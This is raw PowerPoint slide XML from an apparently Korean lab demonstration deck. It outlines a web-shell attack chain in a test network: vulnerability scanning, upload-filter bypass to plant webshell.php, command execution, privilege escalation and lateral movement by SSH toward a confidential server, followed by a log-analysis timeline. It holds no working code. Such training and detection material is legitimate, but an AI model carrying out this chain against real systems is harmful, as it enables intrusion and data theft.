          <p:cNvPr id="45" name="Text 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="2038198"/>
            <a:ext cx="1248156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배경 설정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33116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71500" y="381305"/>
            <a:ext cx="571500" cy="57607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 793654"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EF444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571500" y="1047902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내부 웹 서버 진입 후 권한 상승 및 측면 이동(Lateral Movement) 단계</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="533095"/>
            <a:ext cx="3991356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공격 시나리오 1: 웹쉘 공격</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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-505" r="-505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632558" y="3614623"/>
            <a:ext cx="114300" cy="18105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rcRect l="-505" r="-505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903927" y="3614623"/>
            <a:ext cx="114300" cy="18105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 l="-505" r="-505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174382" y="3614623"/>
            <a:ext cx="114300" cy="18105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rcRect l="-505" r="-505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9444838" y="3614623"/>
            <a:ext cx="114300" cy="181051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571500" y="1695298"/>
            <a:ext cx="1971446" cy="4591202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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269187" y="1990649"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="94A3B8">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="94A3B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40180" y="2162556"/>
            <a:ext cx="228600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661111" y="2704795"/>
            <a:ext cx="1793138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접근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(Initial Access)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675742" y="3147365"/>
            <a:ext cx="1764792" cy="2200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공개된 웹 서비스 취약점 탐색 및 업로드 경로 확보 시도</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724205" y="5484571"/>
            <a:ext cx="1666951" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14055"/>
            </a:avLst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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724205" y="5484571"/>
            <a:ext cx="1666951" cy="19202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="94A3B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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779069" y="5598871"/>
            <a:ext cx="155722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00" b="1" kern="0" spc="42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ATTACK TECH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770839" y="5797296"/>
            <a:ext cx="1573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Vuln Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2841955" y="1695298"/>
            <a:ext cx="1971446" cy="4591202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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3539642" y="1990649"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FACC15">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="FACC1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5"/>
          <a:srcRect l="-133" r="-133"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3739896" y="2162556"/>
            <a:ext cx="171907" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2931566" y="2704795"/>
            <a:ext cx="1793138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웹쉘 설치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(Installation)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946197" y="3147365"/>
            <a:ext cx="1764792" cy="2200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파일 업로드 필터링 우회 후 악성 스크립트(Web Shell) 설치</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994660" y="5484571"/>
            <a:ext cx="1666951" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14055"/>
            </a:avLst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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994660" y="5484571"/>
            <a:ext cx="1666951" cy="19202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FACC1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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3049524" y="5598871"/>
            <a:ext cx="155722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00" b="1" kern="0" spc="42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ATTACK TECH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3041294" y="5797296"/>
            <a:ext cx="1573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File Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5113325" y="1695298"/>
            <a:ext cx="1971446" cy="4591202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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5810098" y="1990649"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FB923C">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="FB923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6"/>
          <a:srcRect t="-45" b="-45"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5967374" y="2162556"/>
            <a:ext cx="256946" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233111" y="2704795"/>
            <a:ext cx="1726387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명령 실행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(Execution)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216652" y="3147365"/>
            <a:ext cx="1764792" cy="2200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업로드된 웹쉘을 통해 시스템 정보 조회 및 중요 파일 접근</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5265115" y="5484571"/>
            <a:ext cx="1666951" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14055"/>
            </a:avLst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4" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5265115" y="5484571"/>
            <a:ext cx="1666951" cy="19202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FB92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Text 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5320894" y="5598871"/>
            <a:ext cx="155722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00" b="1" kern="0" spc="42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ATTACK TECH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5312664" y="5797296"/>
            <a:ext cx="1573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Command Inj.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7383780" y="1695298"/>
            <a:ext cx="1971446" cy="4591202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8" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8081467" y="1990649"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F87171">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="F8717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9" name="Image 7" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="-57" r="-57"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8267090" y="2162556"/>
            <a:ext cx="200254" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7473391" y="2704795"/>
            <a:ext cx="1793138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권한 상승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(Privilege Esc)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7488022" y="3147365"/>
            <a:ext cx="1764792" cy="2200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취약한 설정이나 커널 취약점을 악용하여 Root 권한 획득</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536485" y="5484571"/>
            <a:ext cx="1666951" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14055"/>
            </a:avLst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3" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536485" y="5484571"/>
            <a:ext cx="1666951" cy="19202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8717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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7591349" y="5598871"/>
            <a:ext cx="155722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00" b="1" kern="0" spc="42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ATTACK TECH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7583119" y="5797296"/>
            <a:ext cx="1573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Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9655150" y="1695298"/>
            <a:ext cx="1971446" cy="4591202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37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10351922" y="1990649"/>
            <a:ext cx="571500" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C084FC">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="C084F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8" name="Image 8" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect l="-80" r="-80"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10494569" y="2162556"/>
            <a:ext cx="286207" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9744761" y="2704795"/>
            <a:ext cx="1793138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SSH 시도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(Lateral Move)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9758477" y="3147365"/>
            <a:ext cx="1764792" cy="2200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탈취한 계정 정보를 이용해 내부망의 타 시스템으로 SSH 접속</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9806940" y="5484571"/>
            <a:ext cx="1666951" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14055"/>
            </a:avLst>
          </a:pr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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9806940" y="5484571"/>
            <a:ext cx="1666951" cy="19202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C084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3" name="Text 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9862718" y="5598871"/>
            <a:ext cx="155722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00" b="1" kern="0" spc="42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ATTACK TECH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9853574" y="5797296"/>
            <a:ext cx="1573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SSH Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1401775" y="1561795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6" name="Text 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1419149" y="1612087"/>
            <a:ext cx="27432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1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3673145" y="1561795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8" name="Text 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690518" y="1612087"/>
            <a:ext cx="27432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1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="1561795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0" name="Text 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5960974" y="1612087"/>
            <a:ext cx="27432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1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8214970" y="1561795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2" name="Text 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8232343" y="1612087"/>
            <a:ext cx="27432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sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485425" y="1561795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4" name="Text 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10502798" y="1612087"/>
            <a:ext cx="27432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sz="1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5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20985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9939985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16858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20985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시나리오 1: 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초기 접근</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209854" y="1438656"/>
            <a:ext cx="333910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10.0.0.134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-&gt;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10.10.0.102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(Web Server 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공격</a:t>
            </a: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)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20985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웹쉘 공격 시도에 대한 통합 로그 분석 및 타임라인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7" descr="텍스트, 도표, 스크린샷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157B0A-D9D6-5D1C-6240-B8D89EF1A7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37" r="7266"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="255254" y="1705661"/>
            <a:ext cx="7106599" cy="4893825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="오른쪽 화살표 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20536982">
            <a:off x="1512685" y="3889659"/>
            <a:ext cx="4655110" cy="25366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Shape 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB07526-6CBB-B669-9591-23F3FAFFB279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7705355" y="1686458"/>
            <a:ext cx="3934499" cy="4913028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D8D18311-F39B-EE4F-40E7-4B70A6CABC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80" r="-80"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7938018" y="1956517"/>
            <a:ext cx="286207" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7938018" y="2269916"/>
            <a:ext cx="3380016" cy="333622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공격 환경 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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10.0.0.134</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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10.10.0.102</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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취약 웹서버를 타겟</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="150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ko-KR" altLang="en-US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공격 목적</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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최종적으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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10.10.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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기밀서버 문서 접근 목표</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="150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ko-KR" altLang="en-US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시연 시나리오</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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로그인 페이지 우회 시도 및 웹셀 업로드 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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후 시스템 명령어 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8456888" y="1955362"/>
            <a:ext cx="3268686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개요 및 공격 시나리오</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2479674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5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2415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054285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28288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32415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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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시나리오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1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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웹셀</a:t>
            </a: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설치</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5893307" y="5155844"/>
            <a:ext cx="333910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 dirty="0" err="1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webshell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32415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webshell.php </a:t>
            </a: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및 업로드</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="그림 65"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="68170"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5893306" y="5440807"/>
            <a:ext cx="5517871" cy="10174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7" name="그림 6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893307" y="1830832"/>
